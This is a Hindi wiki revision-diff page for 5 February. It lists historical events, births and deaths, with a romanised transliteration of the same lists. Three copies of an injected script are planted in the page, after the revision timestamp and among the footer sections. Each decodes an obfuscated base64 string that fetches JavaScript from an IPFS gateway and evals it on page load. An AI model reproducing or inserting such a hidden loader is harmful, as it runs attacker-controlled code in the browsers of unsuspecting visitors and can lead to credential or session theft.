Difference between revisions of "5 फ़रवरी"

भारत डिस्कवरी प्रस्तुति
Jump to navigation Jump to search
[unchecked revision][unchecked revision]
 
(4 intermediate revisions by the same user not shown)
Line 4: Line 4:
  
 
==5 फ़रवरी की महत्त्वपूर्ण घटनाएँ==
 
==5 फ़रवरी की महत्त्वपूर्ण घटनाएँ==
 +
* 664 - प्रसिद्ध चीनी बौद्ध भिक्षु [[ह्वेन त्सांग ]] का निधन हुआ।
 
* 1679 - जर्मन शासक लियोपोल्ड प्रथम ने [[फ्रांस]] के साथ शांति समझौते पर हस्ताक्षर किये।
 
* 1679 - जर्मन शासक लियोपोल्ड प्रथम ने [[फ्रांस]] के साथ शांति समझौते पर हस्ताक्षर किये।
 
* 1783 - [[इटली]] के कालाब्रिया में भीषण [[भूकंप]] में 30000 लोग मारे गये।
 
* 1783 - [[इटली]] के कालाब्रिया में भीषण [[भूकंप]] में 30000 लोग मारे गये।
Line 15: Line 16:
 
* [[1961]] - ब्रिटिश समाचार पत्र संडे टेलीग्राफ के पहले संस्करण का प्रकाशन हुआ।
 
* [[1961]] - ब्रिटिश समाचार पत्र संडे टेलीग्राफ के पहले संस्करण का प्रकाशन हुआ।
 
* [[1970]] - अमेरिका ने नेवादा में परमाणु परीक्षण किया।
 
* [[1970]] - अमेरिका ने नेवादा में परमाणु परीक्षण किया।
 +
* [[1994]] - सरायेवो के बाजार में नरसंहार हुआ। सरायेवो के मुख्य बाजार में एक मोर्टार बम के फटने से 68 लोगों की मौत हो गई थी और 200 लोग घायल हुए थे।
 
* [[2004]] - [[पाकिस्तान]] के राष्ट्रपति परवेज मुशर्रफ़ ने परमाणु प्रौद्योगिकी के ग़लत इस्तेमाल के मामले में परमाणु वैज्ञानिक अब्दुल कादिर ख़ान को माफी दी।  
 
* [[2004]] - [[पाकिस्तान]] के राष्ट्रपति परवेज मुशर्रफ़ ने परमाणु प्रौद्योगिकी के ग़लत इस्तेमाल के मामले में परमाणु वैज्ञानिक अब्दुल कादिर ख़ान को माफी दी।  
 
* [[2006]] - ईरान ने यूरेनियम संवर्धन शुरू किया।  
 
* [[2006]] - ईरान ने यूरेनियम संवर्धन शुरू किया।  
Line 20: Line 22:
 
* [[2008]] -  
 
* [[2008]] -  
 
**[[पंजाब]] में [[पटियाला]] की विशेष अदालत ने [[कंधार]] विमान अपहरण मामले में तीन आरोपियों को आजीवन कारावास की सज़ा सुनाई। [[केनरा बैंक|केनरा]] व इलाहाबाद बैंक ने गृह ॠण पर ब्याज दरें 0.4-0.5 प्रतिशता घटायी।
 
**[[पंजाब]] में [[पटियाला]] की विशेष अदालत ने [[कंधार]] विमान अपहरण मामले में तीन आरोपियों को आजीवन कारावास की सज़ा सुनाई। [[केनरा बैंक|केनरा]] व इलाहाबाद बैंक ने गृह ॠण पर ब्याज दरें 0.4-0.5 प्रतिशता घटायी।
**पाकिस्तान के विवादास्पद परमाणु वैज्ञानिक अब्दुल कादिर ख़ान को सरकार ने अपने क़रीबी मित्रों से मिलने की अनुमति दी।  
+
**पाकिस्तान के विवादास्पद परमाणु वैज्ञानिक अब्दुल कादिर ख़ान को सरकार ने अपने क़रीबी मित्रों से मिलने की अनुमति दी।
 +
* आध्यात्मिक गुरु महर्षि महेश योगी का निधन। साठ के दशक में मशहूर रॉक बैंड बीटल्स के सदस्यों के साथ ही वे कई बड़ी हस्तियों के आध्यात्मिक गुरु थे।
 
* [[2009]] - [[मायावती]] ने प्रदेश के पाँच महानगरों [[लखनऊ]], फ़ैज़ाबाद, [[अयोध्या]], [[कानपुर]], [[बिठूर]], [[इलाहाबाद]] और [[मेरठ]] के विकास के लिए 5056 करोड़ रुपये की परियोजनाओं का लोकार्पण व शिलान्यास किया। प्रेम जनमेजय को व्यंग्यश्री सम्मान देने की घोषणा की गयी।  
 
* [[2009]] - [[मायावती]] ने प्रदेश के पाँच महानगरों [[लखनऊ]], फ़ैज़ाबाद, [[अयोध्या]], [[कानपुर]], [[बिठूर]], [[इलाहाबाद]] और [[मेरठ]] के विकास के लिए 5056 करोड़ रुपये की परियोजनाओं का लोकार्पण व शिलान्यास किया। प्रेम जनमेजय को व्यंग्यश्री सम्मान देने की घोषणा की गयी।  
 
* [[2010]] - भारतीय निशानेबाज अभिनव बिंद्रा ने नीदरलैंड इंटरनेशनल शूटिंग चैंपियनशिप में 600 में से 596 अंक हासिल कर स्वर्ण पदक जीत लिया।
 
* [[2010]] - भारतीय निशानेबाज अभिनव बिंद्रा ने नीदरलैंड इंटरनेशनल शूटिंग चैंपियनशिप में 600 में से 596 अंक हासिल कर स्वर्ण पदक जीत लिया।
 +
* [[2020]] - यूक्रेन स्कैंडल मामले में अमेरिकी सीनेट ने डोनाल्ड ट्रम्प पर चल रही महाभियोग की कार्रवाई को निरस्त किया। ट्रम्प पर अमेरिका के निचले सदन हाउस ऑफ रिप्रजेंटेटिव ने महाभियोग पास किया था।
  
 
==5 फ़रवरी को जन्मे व्यक्ति==
 
==5 फ़रवरी को जन्मे व्यक्ति==
 +
* [[1990]] - भुवनेश्वर कुमार - भारतीय तेज गेंदबाज हैं।
 +
* [[1970]] - [[होरेन सिंह बे]] - भारतीय राज्य [[असम]] से आने वाले राजनीतिज्ञ हैं।
 
* 1630 - हर राय - सिखों के सातवें गुरु का [[पंजाब]] के कीरतपुर।
 
* 1630 - हर राय - सिखों के सातवें गुरु का [[पंजाब]] के कीरतपुर।
 
* 1639 - [[ज़ेबुन्निसा]] - मुग़ल बादशाह औरंगज़ेब की पुत्री थी।
 
* 1639 - [[ज़ेबुन्निसा]] - मुग़ल बादशाह औरंगज़ेब की पुत्री थी।
 
* [[1916]] - [[जानकी वल्लभ शास्त्री]] - प्रसिद्ध कवि  
 
* [[1916]] - [[जानकी वल्लभ शास्त्री]] - प्रसिद्ध कवि  
 +
* [[1968]] - [[प्रेम सिंह तमांग]] - [[सिक्किम]] के राजनीतिज्ञों में से एक हैं।
 
* [[1976]] - [[अभिषेक बच्चन]] - फ़िल्म [[अभिनेता]]
 
* [[1976]] - [[अभिषेक बच्चन]] - फ़िल्म [[अभिनेता]]
 +
* [[1932]] - [[शंख घोष]] - प्रसिद्ध बांग्ला कवि, आलोचक एवं शिक्षाविद थे।
  
 
==5 फ़रवरी को हुए निधन==
 
==5 फ़रवरी को हुए निधन==
 
* [[2014]] - [[जुथिका रॉय]], प्रसिद्ध भजन गायिका।
 
* [[2014]] - [[जुथिका रॉय]], प्रसिद्ध भजन गायिका।
 
* [[2010]] - [[सुजीत कुमार]] - [[भोजपुरी भाषा|भोजपुरी]] और [[हिन्दी]] फ़िल्मों के प्रसिद्ध अभिनेता थे।
 
* [[2010]] - [[सुजीत कुमार]] - [[भोजपुरी भाषा|भोजपुरी]] और [[हिन्दी]] फ़िल्मों के प्रसिद्ध अभिनेता थे।
* [[2008]] - महर्षि महेश योगी - भारतीय आत्मिक योगी
+
* [[2008]] - [[म​​हर्षि महेश योगी]] - प्रसिद्ध भारतीय योगाचार्य थे, जिन्होंने [[योग]] को [[भारत]] के बाहर भी प्रसिद्धि दिलाई।
 
* 664 ई. - [[ह्वेन त्सांग]] - प्रसिद्ध चीनी बौद्ध भिक्षु थे।
 
* 664 ई. - [[ह्वेन त्सांग]] - प्रसिद्ध चीनी बौद्ध भिक्षु थे।
 
* [[1927]] - इनायत ख़ान - भारतीय सूफ़ी संत
 
* [[1927]] - इनायत ख़ान - भारतीय सूफ़ी संत

Latest revision as of 05:50, 9 November 2022

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>

gregori kailandar ke anusar 5 faravari varsh ka 36 vaan din hai. sal mean abhi aur 329 din shesh haian. (lip varsh mean 330 din)

5 faravari ki mahattvapoorn ghatanaean

  • 664 - prasiddh chini bauddh bhikshu hven tsaang ka nidhan hua.
  • 1679 - jarman shasak liyopold pratham ne phraans ke sath shaanti samajhaute par hastakshar kiye.
  • 1783 - itali ke kalabriya mean bhishan bhookanp mean 30000 log mare gaye.
  • 1870 - philadelphiya ke thiyetar mean pahali bar chalachitr dikhaya gaya.
  • 1900 - amerika aur briten ke madhy panama nahar samajhaute par hastakshar.
  • 1904 - kyooba amerika ke kabje se mukt hua.
  • 1917 - maiksiko ne naya sanvidhan aangikrit kiya.
  • 1922 - uttar pradesh ke gorakhapur ke pas chauri chaura kasbe mean ugr bhi d ne thane mean ag laga di jisamean 22 pulisakarmiyoan ki maut ho gayi.
  • 1924 - rediyo samay sanketak jiemati ka pahali bar prasaran rayal grinavich se hua.
  • 1931 - maiksine danalap pahali glaidar payalat bani.
  • 1961 - british samachar patr sande teligraph ke pahale sanskaran ka prakashan hua.
  • 1970 - amerika ne nevada mean paramanu parikshan kiya.
  • 1994 - sarayevo ke bajar mean narasanhar hua. sarayevo ke mukhy bajar mean ek mortar bam ke phatane se 68 logoan ki maut ho gee thi aur 200 log ghayal hue the.
  • 2004 - pakistan ke rashtrapati paravej musharraf ne paramanu praudyogiki ke galat istemal ke mamale mean paramanu vaijnanik abdul kadir khan ko maphi di.
  • 2006 - eeran ne yooreniyam sanvardhan shuroo kiya.
  • 2007 - bharatiy mool ki sunita aantariksh mean sabase adhik samay bitane vali mahila banian.
  • 2008 -
    • panjab mean patiyala ki vishesh adalat ne kandhar viman apaharan mamale mean tin aropiyoan ko ajivan karavas ki saza sunaee. kenara v ilahabad baiank ne grih rrin par byaj darean 0.4-0.5 pratishata ghatayi.
    • pakistan ke vivadaspad paramanu vaijnanik abdul kadir khan ko sarakar ne apane qaribi mitroan se milane ki anumati di.
  • adhyatmik guru maharshi mahesh yogi ka nidhan. sath ke dashak mean mashahoor r aauk baiand bitals ke sadasyoan ke sath hi ve kee b di hastiyoan ke adhyatmik guru the.
  • 2009 - mayavati ne pradesh ke paanch mahanagaroan lakhanoo, faizabad, ayodhya, kanapur, bithoor, ilahabad aur merath ke vikas ke lie 5056 karo d rupaye ki pariyojanaoan ka lokarpan v shilanyas kiya. prem janamejay ko vyangyashri samman dene ki ghoshana ki gayi.
  • 2010 - bharatiy nishanebaj abhinav biandra ne nidaralaiand iantaraneshanal shootiang chaianpiyanaship mean 600 mean se 596 aank hasil kar svarn padak jit liya.
  • 2020 - yookren skaiandal mamale mean ameriki sinet ne donald tramp par chal rahi mahabhiyog ki karravaee ko nirast kiya. tramp par amerika ke nichale sadan haus aauph riprajeantetiv ne mahabhiyog pas kiya tha.

5 faravari ko janme vyakti

5 faravari ko hue nidhan

5 faravari ke mahattvapoorn avasar evan utsav

  • van agni suraksha divas (saptah).

bahari k diyaan

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>

sanbandhit lekh

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>